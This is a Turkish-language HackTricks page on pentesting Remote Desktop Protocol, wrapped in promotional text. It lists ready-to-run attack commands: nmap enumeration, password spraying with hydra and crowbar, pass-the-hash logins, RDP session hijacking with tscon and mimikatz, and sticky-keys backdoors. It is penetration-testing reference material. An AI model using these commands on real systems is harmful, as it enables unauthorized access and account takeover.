9.6 KiB
3389 - RDP Pentesting
AWS hacklemeyi sıfırdan ileri seviyeye öğrenin htARTE (HackTricks AWS Red Team Expert) ile!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Family'yi keşfedin, özel NFT'lerimiz koleksiyonumuz
- Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm** takip edin.**
- Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
Vulnerability assessment & penetration testing için anında kullanılabilir kurulum. 20'den fazla araç ve özellikle tam bir pentest çalıştırın, keşiften raporlamaya kadar uzanan. Pentester'ları değiştirmiyoruz - özel araçlar, tespit ve istismar modülleri geliştiriyoruz, böylece daha derine inmek, shell'ler açmak ve eğlenmek için zaman kazanmalarını sağlıyoruz.
{% embed url="https://pentest-tools.com/" %}
Temel Bilgiler
Microsoft tarafından geliştirilen Remote Desktop Protocol (RDP), bilgisayarlar arasında ağ üzerinden grafik arayüz bağlantısını sağlamak amacıyla tasarlanmıştır. Bu tür bir bağlantı kurmak için kullanıcı tarafından RDP istemci yazılımı kullanılır ve aynı anda uzak bilgisayarın RDP sunucu yazılımını çalıştırması gerekir. Bu kurulum, uzak bir bilgisayarın masaüstü ortamının sorunsuz kontrol ve erişimine olanak tanır, esasen kullanıcının yerel cihazına arayüzünü getirir.
Varsayılan port: 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Sıralama
Otomatik
{% code overflow="wrap" %}
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
{% endcode %}
Mevcut şifreleme ve DoS zafiyetini kontrol eder (hizmete DoS saldırısı yapmadan) ve NTLM Windows bilgilerini (sürümleri) elde eder.
Kaba kuvvet
Dikkatli olun, hesapları kilitleyebilirsiniz
Şifre Sıçratma
Dikkatli olun, hesapları kilitleyebilirsiniz
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
Bilinen kimlik bilgileri/hash ile bağlanın
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
Bilinen kimlik bilgilerini RDP hizmetlerine karşı kontrol et
rdp_check.py, impacket'ten bir betiği kullanarak belirli kimlik bilgilerinin bir RDP hizmeti için geçerli olup olmadığını kontrol etmenizi sağlar:
rdp_check <domain>/<name>:<password>@<IP>
Zararlı yazılım değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum. Keşiften raporlamaya kadar olan 20'den fazla araç ve özellikle herhangi bir yerden tam bir pentest çalıştırın. Pentester'ları değiştirmiyoruz - özel araçlar, tespit ve istismar modülleri geliştiriyoruz ki bu da onlara daha fazla zaman kazandırarak daha derine inmelerini, kabukları patlatmalarını ve eğlenmelerini sağlar.
{% embed url="https://pentest-tools.com/" %}
Saldırılar
Oturum çalma
SİSTEM izinleriyle herhangi bir kullanıcının açık RDP oturumuna sahip olabilir ve sahibinin şifresini bilmeye gerek duymazsınız.
Açık oturumları alın:
query user
Seçilen oturuma erişim
tscon <ID> /dest:<SESSIONNAME>
Şimdi seçilen RDP oturumunun içinde olacaksınız ve yalnızca Windows araçları ve özelliklerini kullanarak bir kullanıcıyı taklit etmeniz gerekecek.
Önemli: Etkin bir RDP oturumuna eriştiğinizde, o oturumu kullanan kullanıcıyı atacaksınız.
Şifreleri işlemi dökerek alabilirsiniz, ancak bu yöntem çok daha hızlıdır ve kullanıcının sanal masaüstleriyle etkileşimde bulunmanızı sağlar (şifrelerin diske kaydedilmeden not defterinde, diğer makinelerde açılan diğer RDP oturumları...)
Mimikatz
Bunu yapmak için mimikatz'ı da kullanabilirsiniz:
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
Sticky-keys & Utilman
Bu teknikle stickykeys veya utilman ile birleştirildiğinde, her zaman bir yönetici CMD'sine ve herhangi bir RDP oturumuna erişebileceksiniz.
Zaten bu tekniklerden biriyle arka kapıdan giriş yapılmış RDP'leri arayabilirsiniz: https://github.com/linuz/Sticky-Keys-Slayer
RDP Process Injection
Farklı bir etki alanından veya daha iyi ayrıcalıklara sahip biri RDP üzerinden sisteme giriş yaptığında, siz yönetici olduğunuz PC'ye, kendi beacon'ınızı enjekte edebilir ve onun gibi davranabilirsiniz:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}
Adding User to RDP group
net localgroup "Remote Desktop Users" UserLoginName /add
Otomatik Araçlar
AutoRDPwn, öncelikle Microsoft Windows bilgisayarlarda Shadow saldırısını otomatikleştirmek için tasarlanmış Powershell'de oluşturulmuş bir son aşama saldırı çerçevesidir. Bu zayıflık (Microsoft tarafından bir özellik olarak listelenmiştir), uzaktan bir saldırganın izin almadan kurbanının masaüstünü görmesine ve hatta işletim sistemi içindeki araçları kullanarak isteğe bağlı olarak kontrol etmesine olanak tanır.
- EvilRDP
- Fare ve klavyeyi komut satırından otomatik olarak kontrol etme
- Pano üzerinden komut satırından otomatik olarak kontrol etme
- İstemciden RDP aracılığıyla hedefe ağ iletişimini yönlendiren SOCKS proxy'si oluşturma
- Hedef üzerinde dosya yükleme ve indirme, hedefte dosya transferleri devre dışı bırakıldığında bile
- Hedef üzerinde dosya yükleme ve indirme, hedefte dosya transferleri devre dışı bırakıldığında bile
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
Zafere ulaşmak için sıfırdan AWS hackleme öğrenin. 20'den fazla araç ve özellikle her yerden tam bir pentest çalıştırın, keşiften raporlamaya kadar uzanan. Pentester'ları değiştirmiyoruz - özel araçlar, tespit ve sömürü modülleri geliştiriyoruz, böylece daha derine inmek, kabukları patlatmak ve eğlenmek için zaman kazanıyorlar.
{% embed url="https://pentest-tools.com/" %}
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olana kadar AWS hacklemeyi öğrenin!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
- Resmi PEASS & HackTricks ürünlerini alın
- [The PEASS Family]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter'da takip edin 🐦 @carlospolopm.**
- Hacking hilelerinizi paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katılın.